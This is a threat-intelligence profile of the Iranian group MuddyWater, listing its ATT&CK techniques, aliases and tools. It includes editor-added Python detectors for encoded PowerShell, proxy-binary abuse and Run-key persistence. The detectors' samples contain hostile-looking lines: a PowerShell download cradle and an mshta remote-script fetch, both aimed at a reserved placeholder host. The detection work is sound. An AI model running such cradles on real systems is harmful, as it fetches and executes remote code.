MuddyWater

MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)
ID: G0069
Associated Groups: Seedworm, TA450, Earth Vetala, Mango Sandstorm, TEMP.Zagros, Static Kitten, MERCURY
Version: 5.1
Created: 18 Apr 2018
Last Modified: 29 Aug 2024

Associated Group Descriptions

Name Description
Seedworm (Citation: Symantec MuddyWater Dec 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)
TA450 (Citation: Proofpoint TA450 Phishing March 2024)
Earth Vetala (Citation: Trend Micro Muddy Water March 2021)
Mango Sandstorm (Citation: Microsoft Threat Actor Naming July 2023)
TEMP.Zagros (Citation: FireEye MuddyWater Mar 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)
Static Kitten (Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)
MERCURY (Citation: Anomali Static Kitten February 2021)

Techniques Used

Domain ID Name Use
Enterprise T1548 .002 Abuse Elevation Control Mechanism: Bypass User Account Control

MuddyWater uses various techniques to bypass UAC.(Citation: ClearSky MuddyWater Nov 2018)

Enterprise T1087 .002 Account Discovery: Domain Account

MuddyWater has run `net user /domain` from cmd.exe to enumerate domain users.(Citation: Trend Micro Muddy Water March 2021)

Enterprise T1583 .006 Acquire Infrastructure: Web Services

MuddyWater has used file sharing services including OneHub, Sync, and TeraBox to distribute tools.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)(Citation: Proofpoint TA450 Phishing March 2024)

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

MuddyWater has used HTTP for C2 communications.(Citation: ClearSky MuddyWater June 2019)(Citation: Trend Micro Muddy Water March 2021)

Enterprise T1560 .001 Archive Collected Data: Archive via Utility

MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.(Citation: Symantec MuddyWater Dec 2018)

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

MuddyWater has added the Registry Run key value `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding` to establish persistence.(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)(Citation: Talos MuddyWater Jan 2022)

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

MuddyWater has used PowerShell for execution.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Talos MuddyWater May 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)

.003 Command and Scripting Interpreter: Windows Command Shell

MuddyWater has used a custom tool for creating reverse shells.(Citation: Symantec MuddyWater Dec 2018)

.005 Command and Scripting Interpreter: Visual Basic

MuddyWater has used VBScript files to execute its POWERSTATS payload, as well as macros.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)(Citation: Talos MuddyWater Jan 2022)

.006 Command and Scripting Interpreter: Python

MuddyWater has developed tools in Python including Out1.(Citation: Trend Micro Muddy Water March 2021)

.007 Command and Scripting Interpreter: JavaScript

MuddyWater has used JavaScript files to execute its POWERSTATS payload.(Citation: ClearSky MuddyWater Nov 2018)(Citation: FireEye MuddyWater Mar 2018)(Citation: DHS CISA AA22-055A MuddyWater February 2022)

Enterprise T1555 .003 Credentials from Password Stores: Credentials from Web Browsers

MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers.(Citation: Symantec MuddyWater Dec 2018)(Citation: Trend Micro Muddy Water March 2021)

Enterprise T1132 .001 Data Encoding: Standard Encoding

MuddyWater has used tools to encode C2 communications including Base64 encoding.(Citation: ClearSky MuddyWater June 2019)(Citation: Trend Micro Muddy Water March 2021)

Enterprise T1074 .001 Data Staged: Local Data Staging

MuddyWater has stored a decoy PDF file within a victim's `%temp%` folder.(Citation: Talos MuddyWater Jan 2022)

Enterprise T1573 .001 Encrypted Channel: Symmetric Cryptography

MuddyWater has used AES to encrypt C2 responses.(Citation: Talos MuddyWater Jan 2022)

Enterprise T1589 .002 Gather Victim Identity Information: Email Addresses

MuddyWater has specifically targeted government agency employees with spearphishing e-mails.(Citation: Anomali Static Kitten February 2021)

Enterprise T1574 .001 Hijack Execution Flow: DLL

MuddyWater maintains persistence on victim networks by side-loading DLLs, tricking legitimate programs into running malware.(Citation: DHS CISA AA22-055A MuddyWater February 2022)

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

MuddyWater can disable the system's local proxy settings.(Citation: Trend Micro Muddy Water March 2021)

Enterprise T1559 .001 Inter-Process Communication: Component Object Model

MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: DHS CISA AA22-055A MuddyWater February 2022)

.002 Inter-Process Communication: Dynamic Data Exchange

MuddyWater has used malware that can execute PowerShell scripts via DDE.(Citation: Securelist MuddyWater Oct 2018)

Enterprise T1036 .005 Masquerading: Match Legitimate Resource Name or Location

MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender.(Citation: FireEye MuddyWater Mar 2018)(Citation: Talos MuddyWater May 2019)(Citation: Anomali Static Kitten February 2021)

Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

MuddyWater has performed credential dumping with Mimikatz and procdump64.exe.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: Trend Micro Muddy Water March 2021)

.004 OS Credential Dumping: LSA Secrets

MuddyWater has performed credential dumping with LaZagne.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)

.005 OS Credential Dumping: Cached Domain Credentials

MuddyWater has performed credential dumping with LaZagne.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)

Enterprise T1027 .003 Obfuscated Files or Information: Steganography

MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.(Citation: ClearSky MuddyWater Nov 2018)

.004 Obfuscated Files or Information: Compile After Delivery

MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code.(Citation: ClearSky MuddyWater Nov 2018)

.010 Obfuscated Files or Information: Command Obfuscation

MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: GitHub Invoke-Obfuscation) The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: ClearSky MuddyWater June 2019)(Citation: Trend Micro Muddy Water March 2021)(Citation: Talos MuddyWater Jan 2022)
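
The entries above for PowerShell execution (T1059.001), the mshta one-liner (T1218.005) and command obfuscation (T1027.010) all hinge on analysts being able to see through `-EncodedCommand` and Invoke-Obfuscation-style tricks. The following Python example is added here by the editor and is not code from the original page, from MITRE, or from any of the cited reports. It decodes the Base64/UTF-16LE payload that powershell.exe accepts behind any unambiguous prefix of `-EncodedCommand` (`-e`, `-enc`, ...) and scores a command line against a handful of indicators; the indicator names and the sample command lines are constructed for illustration, and the URL host is a reserved name.

```python
import base64
import binascii
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; the
# argument is Base64 over the UTF-16LE bytes of the script text.
_ENC_FLAG = re.compile(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Indicators typical of Invoke-Obfuscation output and download cradles.
# The labels are hypothetical; tune the patterns to your own telemetry.
INDICATORS = {
    "iex": re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE),
    "download_cradle": re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.IGNORECASE),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "backtick_escape": re.compile(r"[A-Za-z]`[A-Za-z]"),          # I`E`X
    "format_operator": re.compile(r"\{\d+\}[^'\"]*['\"]\s*-f\b", re.IGNORECASE),  # '{0}{1}' -f 'a','b'
    "char_cast": re.compile(r"\[char\]", re.IGNORECASE),
    "join_operator": re.compile(r"-join\b", re.IGNORECASE),
    "nested_base64": re.compile(r"FromBase64String", re.IGNORECASE),
}


def encode_for_powershell(script: str) -> str:
    """Build a -EncodedCommand argument exactly the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def extract_encoded_command(cmdline: str):
    """Return the decoded script behind -EncodedCommand, or None if absent or invalid."""
    for m in _ENC_FLAG.finditer(cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy, which also starts with "e"
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16le")
        except (binascii.Error, UnicodeDecodeError):
            return None
    return None


def analyze_command_line(cmdline: str) -> dict:
    """Decode any encoded payload and list the indicators found in the raw
    command line or in the decoded script (so tricks hidden inside the
    Base64 blob are still counted)."""
    decoded = extract_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"decoded": decoded, "indicators": hits, "score": len(hits)}


# Constructed samples, not real telemetry.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLES = {
    "encoded": "powershell.exe -nop -w hidden -enc " + encode_for_powershell(SAMPLE_SCRIPT),
    "obfuscated": r'''powershell.exe -w hidden -c "I`E`X ('{0}{1}' -f 'Net.Web','Client')"''',
    "benign": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
}

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        r = analyze_command_line(cmd)
        print(f"{label:>10}: score={r['score']} indicators={r['indicators']}")
        if r["decoded"]:
            print(f"{'':>12}decoded: {r['decoded']}")
```

The score is deliberately coarse: a single indicator such as `-w hidden` is common in legitimate administration, but an encoded payload that decodes to a download cradle invoking `IEX` is rarely benign. Run the decoder over the Sysmon Event ID 1 or Security 4688 command-line field, and keep the decoded text in the alert so the analyst does not have to repeat the step.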

Enterprise T1588 .002 Obtain Capabilities: Tool

MuddyWater has used legitimate tools ConnectWise, RemoteUtilities, and SimpleHelp to gain access to the target environment.(Citation: Anomali Static Kitten February 2021)(Citation: group-ib_muddywater_infra)

Enterprise T1137 .001 Office Application Startup: Office Template Macros

MuddyWater has used a Word Template, Normal.dotm, for persistence.(Citation: Reaqta MuddyWater November 2017)

Enterprise T1566 .001 Phishing: Spearphishing Attachment

MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Proofpoint TA450 Phishing March 2024)

.002 Phishing: Spearphishing Link

MuddyWater has sent targeted spearphishing e-mails with malicious links.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)(Citation: Proofpoint TA450 Phishing March 2024)

Enterprise T1090 .002 Proxy: External Proxy

MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location.(Citation: Symantec MuddyWater Dec 2018) MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2).(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

MuddyWater has used scheduled tasks to establish persistence.(Citation: Reaqta MuddyWater November 2017)

Enterprise T1518 .001 Software Discovery: Security Software Discovery

MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.(Citation: Securelist MuddyWater Oct 2018)

Enterprise T1218 .003 System Binary Proxy Execution: CMSTP

MuddyWater has used CMSTP.exe and a malicious INF to execute its POWERSTATS payload.(Citation: FireEye MuddyWater Mar 2018)

.005 System Binary Proxy Execution: Mshta

MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)
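
The CMSTP and Mshta entries above, together with the `net user /domain` enumeration (T1087.002) and the makecab.exe staging (T1560.001) earlier on this page, are all executions of signed Windows binaries, so the useful signal is the combination of binary, command line and parent process rather than the binary alone. The Python example below is added by the editor and is not code from the original page or from any cited report. It runs a small rule set over constructed Sysmon Event ID 1 records (field names `Image`, `CommandLine`, `ParentImage` as Sysmon emits them); the rule names, paths, users and the reserved URL host are invented, and two benign look-alike events are included to show what the rules are written to skip.

```python
import ntpath
import re

USER_WRITABLE = re.compile(r"\\(?:Temp|AppData|ProgramData|Public|Downloads)\\", re.IGNORECASE)
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# (ATT&CK sub-technique, hypothetical rule name, predicate over (image, parent, cmdline)).
# Each predicate is written to skip the common benign use of the same binary.
RULES = [
    ("T1218.003", "cmstp_inf_from_user_path",
     lambda img, par, cl: img == "cmstp.exe"
     and re.search(r"\.inf\b", cl, re.IGNORECASE) and USER_WRITABLE.search(cl)),
    ("T1218.005", "mshta_inline_or_remote",
     lambda img, par, cl: img == "mshta.exe"
     and re.search(r"(?:vbscript|javascript):|https?://|\.hta\b", cl, re.IGNORECASE)),
    ("T1087.002", "net_user_domain_enum",
     lambda img, par, cl: img in {"net.exe", "net1.exe"}
     and re.search(r"\buser\b.*/domain\b", cl, re.IGNORECASE)),
    ("T1560.001", "makecab_from_script_host",
     lambda img, par, cl: img == "makecab.exe"
     and (par in SCRIPT_HOSTS or USER_WRITABLE.search(cl))),
]


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def hunt_process_events(events) -> list:
    """Apply every rule to every event; an Office parent raises severity because
    the page's phishing chain starts from a macro or PDF lure."""
    findings = []
    for e in events:
        img, par, cl = _base(e["Image"]), _base(e.get("ParentImage", "")), e.get("CommandLine", "")
        for technique, name, pred in RULES:
            if bool(pred(img, par, cl)):
                findings.append({"technique": technique, "rule": name, "image": img,
                                 "parent": par,
                                 "severity": "high" if par in OFFICE_APPS else "medium"})
    return findings


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r"cmstp.exe /s /ni C:\Users\alice\AppData\Local\Temp\corp.inf",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe javascript:a=GetObject("script:http://example.invalid/x.sct").Exec();close()',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\net1.exe",
     "CommandLine": r"C:\Windows\system32\net1 user /domain",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\makecab.exe",
     "CommandLine": r"makecab.exe C:\Users\alice\AppData\Local\Temp\docs.txt C:\Users\alice\AppData\Local\Temp\1.cab",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    # Benign look-alikes: a VPN profile installed from System32, and a share mapping.
    {"Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r"cmstp.exe /s C:\Windows\System32\corpvpn.inf",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"Image": r"C:\Windows\System32\net.exe",
     "CommandLine": r"net use Z: \\fs1\share /persistent:yes",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for f in hunt_process_events(SAMPLE_EVENTS):
        print(f"{f['technique']} {f['rule']:<26} {f['image']:<12} parent={f['parent']:<16} {f['severity']}")
```

The cmstp rule requires the INF to live in a user-writable directory precisely because `cmstp.exe /s` with a profile under System32 is how legitimate VPN connectoids are installed; without that condition the rule would page on every corporate laptop build.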

.011 System Binary Proxy Execution: Rundll32

MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.(Citation: Securelist MuddyWater Oct 2018)
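
Three entries on this page describe the same registry footprint from different angles: the `SystemTextEncoding` Run key value (T1547.001), Run key values that launch a DLL through rundll32.exe (T1218.011), and value names borrowed from Windows Defender (T1036.005). The Python example below is added by the editor and is not code from the original page or from any cited report. It evaluates constructed Sysmon Event ID 13 (RegistryEvent: Value Set) records, in which Sysmon writes the value path as `TargetObject` and its data as `Details`, and reports HKCU as `HKU\<SID>`; the SIDs, paths and reason labels are invented. A genuine `SecurityHealth` autorun is included to show that a security-sounding name alone is not the signal; the name combined with a target outside Windows or Program Files is.

```python
import ntpath
import re

RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(?:Temp|AppData|ProgramData|Public|Downloads)\\", re.IGNORECASE)
TRUSTED_PATH = re.compile(r"""^["']?(?:%windir%|%systemroot%|C:\\Windows\\|C:\\Program Files)""", re.IGNORECASE)
# Value names that borrow Windows Defender / security-product wording.
SECURITY_WORDS = re.compile(r"defender|security|antimalware|msascui", re.IGNORECASE)
PROXY_BINARIES = {"rundll32.exe", "mshta.exe", "regsvr32.exe", "wscript.exe",
                  "cscript.exe", "powershell.exe", "cmstp.exe"}


def _first_token(details: str) -> str:
    """Lower-cased file name of the executable an autorun value launches."""
    details = details.strip()
    if details.startswith('"'):
        exe = details[1:].split('"', 1)[0]
    else:
        exe = details.split(" ", 1)[0]
    return ntpath.basename(exe).lower()


def check_run_value(event: dict) -> list:
    """Return the reasons a Run/RunOnce value write looks suspicious; [] when the
    write is benign or is not an autorun value at all."""
    target, details = event.get("TargetObject", ""), event.get("Details", "")
    if not RUN_KEY.search(target):
        return []
    value_name = target.rsplit("\\", 1)[-1]
    reasons = []
    launcher = _first_token(details)
    if launcher in PROXY_BINARIES:
        reasons.append("proxy_binary:" + launcher)
    if USER_WRITABLE.search(details):
        reasons.append("user_writable_path")
    # A Defender-sounding value pointing outside Windows/Program Files is the
    # masquerading pattern; the real SecurityHealth entry lives under %windir%.
    if SECURITY_WORDS.search(value_name) and not TRUSTED_PATH.match(details):
        reasons.append("security_name_masquerade")
    return reasons


def hunt_autoruns(events) -> list:
    """Evaluate every registry event and return the findings with their reasons."""
    findings = []
    for e in events:
        reasons = check_run_value(e)
        if reasons:
            findings.append({"value": e["TargetObject"].rsplit("\\", 1)[-1],
                             "image": ntpath.basename(e.get("Image", "")),
                             "reasons": reasons})
    return findings


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\wscript.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding",
     "Details": r"rundll32.exe C:\Users\alice\AppData\Roaming\Microsoft\sys.dll,Start"},
    {"EventID": 13, "Image": r"C:\Users\alice\AppData\Local\Temp\setup.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdate",
     "Details": r"C:\ProgramData\WindowsDefender\MSASCui.exe -silent"},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "Details": r"%windir%\system32\SecurityHealthSystray.exe"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
]

if __name__ == "__main__":
    for f in hunt_autoruns(SAMPLE_EVENTS):
        print(f"{f['value']:<24} written by {f['image']:<12} {', '.join(f['reasons'])}")
```

Sysmon only produces Event ID 13 for keys covered by its configuration, so the Run and RunOnce paths under both HKLM and HKU need to be in the include list before this logic sees anything; the same checks can be run offline against `reg query` output or an Autoruns export if that telemetry is missing.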

Enterprise T1552 .001 Unsecured Credentials: Credentials In Files

MuddyWater has run a tool that steals passwords saved in victim email clients.(Citation: Symantec MuddyWater Dec 2018)

Enterprise T1204 .001 User Execution: Malicious Link

MuddyWater has distributed URLs in phishing e-mails that link to lure documents.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)(Citation: Proofpoint TA450 Phishing March 2024)

.002 User Execution: Malicious File

MuddyWater has attempted to get users to open malicious PDF attachments and to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)(Citation: Proofpoint TA450 Phishing March 2024)

Enterprise T1102 .002 Web Service: Bidirectional Communication

MuddyWater has used web services including OneHub to distribute remote access tools.(Citation: Anomali Static Kitten February 2021)

Software

ID Name References Techniques
S0592 RemoteUtilities (Citation: Trend Micro Muddy Water March 2021) Screen Capture, Msiexec, File and Directory Discovery, Ingress Tool Transfer
S0194 PowerSploit (Citation: GitHub PowerSploit May 2012) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation) (Citation: TrendMicro POWERSTATS V3 June 2019) Scheduled Task, Windows Management Instrumentation, Screen Capture, Keylogging, Path Interception by PATH Environment Variable, Audio Capture, Local Account, Windows Service, DLL, Credentials in Registry, Data from Local System, Reflective Code Loading, Security Support Provider, Path Interception by Search Order Hijacking, LSASS Memory, Domain Trust Discovery, Group Policy Preferences, Process Discovery, PowerShell, Registry Run Keys / Startup Folder, Indicator Removal from Tools, Path Interception by Unquoted Path, Query Registry, Path Interception, Windows Credential Manager, Command Obfuscation, Access Token Manipulation, Kerberoasting, Dynamic-link Library Injection
S0363 Empire (Citation: EmPyre) (Citation: GitHub ATTACK Empire) (Citation: Github PowerShell Empire) (Citation: NCSC Joint Report Public Tools) (Citation: PowerShell Empire) (Citation: TrendMicro POWERSTATS V3 June 2019) Scheduled Task, Windows Management Instrumentation, Screen Capture, System Owner/User Discovery, Keylogging, Path Interception by PATH Environment Variable, Bypass User Account Control, Group Policy Discovery, Local Email Collection, Domain Account, Local Account, Windows Service, SSH, DLL, Automated Collection, Clipboard Data, Network Sniffing, Network Share Discovery, System Information Discovery, Native API, Process Injection, Timestomp, Shortcut Modification, Security Support Provider, Archive Collected Data, Credentials from Web Browsers, Path Interception by Search Order Hijacking, Group Policy Modification, Browser Information Discovery, Private Keys, Local Account, LLMNR/NBT-NS Poisoning and SMB Relay, LSASS Memory, Create Process with Token, Distributed Component Object Model, Video Capture, System Network Configuration Discovery, Accessibility Features, Command and Scripting Interpreter, Domain Account, Domain Trust Discovery, Golden Ticket, Automated Exfiltration, File and Directory Discovery, System Network Connections Discovery, Credentials In Files, Exfiltration to Code Repository, Process Discovery, Exfiltration Over C2 Channel, PowerShell, Exploitation of Remote Services, Registry Run Keys / Startup Folder, Exploitation for Privilege Escalation, SID-History Injection, Bidirectional Communication, Asymmetric Cryptography, Exfiltration to Cloud Storage, Path Interception by Unquoted Path, MSBuild, Security Software Discovery, Windows Command Shell, Silver Ticket, Command Obfuscation, Access Token Manipulation, Web Protocols, Network Service Discovery, Pass the Hash, Ingress Tool Transfer, Service Execution, Kerberoasting, Credential API Hooking, Commonly Used Port, Dylib Hijacking
S0450 SHARPSTATS (Citation: TrendMicro POWERSTATS V3 June 2019) System Owner/User Discovery, System Information Discovery, System Network Configuration Discovery, PowerShell, Command Obfuscation, Ingress Tool Transfer, System Time Discovery
S1047 Mori (Citation: CYBERCOM Iranian Intel Cyber January 2022) (Citation: DHS CISA AA22-055A MuddyWater February 2022) Standard Encoding, DNS, Deobfuscate/Decode Files or Information, Modify Registry, Regsvr32, Query Registry, File Deletion, Web Protocols, Junk Data
S0594 Out1 (Citation: Trend Micro Muddy Water March 2021) Local Email Collection, Data from Local System, Obfuscated Files or Information, Windows Command Shell, Web Protocols
S0591 ConnectWise (Citation: Anomali Static Kitten February 2021) (Citation: ScreenConnect) (Citation: Trend Micro Muddy Water March 2021) Screen Capture, Video Capture, PowerShell
S0002 Mimikatz (Citation: Adsecurity Mimikatz Guide) (Citation: Deply Mimikatz) (Citation: TrendMicro POWERSTATS V3 June 2019) (Citation: Unit 42 MuddyWater Nov 2017) Security Account Manager, LSA Secrets, Credentials from Password Stores, Security Support Provider, Rogue Domain Controller, Credentials from Web Browsers, Private Keys, LSASS Memory, Golden Ticket, Pass the Ticket, Steal or Forge Authentication Certificates, Account Manipulation, SID-History Injection, Silver Ticket, Windows Credential Manager, Pass the Hash, DCSync
S0349 LaZagne (Citation: GitHub LaZagne Dec 2018) (Citation: GitHub LaZange Dec 2018) (Citation: Symantec MuddyWater Dec 2018) (Citation: TrendMicro POWERSTATS V3 June 2019) Keychain, LSA Secrets, Proc Filesystem, Credentials from Password Stores, Credentials from Web Browsers, LSASS Memory, Cached Domain Credentials, Credentials In Files, /etc/passwd and /etc/shadow, Windows Credential Manager
S1046 PowGoop (Citation: CYBERCOM Iranian Intel Cyber January 2022) (Citation: DHS CISA AA22-055A MuddyWater February 2022) Match Legitimate Resource Name or Location, DLL, Deobfuscate/Decode Files or Information, Masquerading, PowerShell, Encrypted Channel, Non-Standard Encoding, Web Protocols
S0488 CrackMapExec (Citation: CME Github September 2018) (Citation: Symantec MuddyWater Dec 2018) (Citation: TrendMicro POWERSTATS V3 June 2019) Windows Management Instrumentation, Password Guessing, Security Account Manager, LSA Secrets, Domain Account, Domain Groups, Network Share Discovery, System Information Discovery, Modify Registry, Password Spraying, System Network Configuration Discovery, File and Directory Discovery, System Network Connections Discovery, PowerShell, Brute Force, Password Policy Discovery, Remote System Discovery, Pass the Hash, NTDS, At
S0250 Koadic (Citation: Github Koadic) (Citation: MalwareBytes LazyScripter Feb 2021) (Citation: Palo Alto Sofacy 06-2018) (Citation: Reaqta MuddyWater November 2017) (Citation: TrendMicro POWERSTATS V3 June 2019) Scheduled Task, Windows Management Instrumentation, System Owner/User Discovery, Rundll32, Bypass User Account Control, Security Account Manager, Clipboard Data, Network Share Discovery, System Information Discovery, Data from Local System, System Network Configuration Discovery, File and Directory Discovery, Mshta, PowerShell, Registry Run Keys / Startup Folder, Regsvr32, Asymmetric Cryptography, Hidden Window, Windows Command Shell, Web Protocols, Visual Basic, Network Service Discovery, Ingress Tool Transfer, Remote Desktop Protocol, NTDS, Service Execution, Dynamic-link Library Injection
S1037 STARWHALE (Citation: CANOPY) (Citation: DHS CISA AA22-055A MuddyWater February 2022) (Citation: Mandiant UNC3313 Feb 2022) System Owner/User Discovery, Standard Encoding, Encrypted/Encoded File, Local Data Staging, Malicious File, Windows Service, System Information Discovery, Data from Local System, System Network Configuration Discovery, Exfiltration Over C2 Channel, Registry Run Keys / Startup Folder, Windows Command Shell, Web Protocols, Visual Basic
S0223 POWERSTATS (Citation: ClearSky MuddyWater June 2019) (Citation: ClearSky MuddyWater Nov 2018) (Citation: FireEye MuddyWater Mar 2018) (Citation: Powermud) (Citation: Symantec MuddyWater Dec 2018) (Citation: Unit 42 MuddyWater Nov 2017) Scheduled Task, Windows Management Instrumentation, Screen Capture, System Owner/User Discovery, Standard Encoding, JavaScript, Dynamic Data Exchange, Local Account, Component Object Model, System Information Discovery, Data from Local System, Deobfuscate/Decode Files or Information, Scheduled Transfer, Junk Code Insertion, External Proxy, System Network Configuration Discovery, Masquerade Task or Service, Mshta, Process Discovery, PowerShell, Disable or Modify Tools, Asymmetric Cryptography, Uncommonly Used Port, Security Software Discovery, Command Obfuscation, File Deletion, Visual Basic, Ingress Tool Transfer, Commonly Used Port
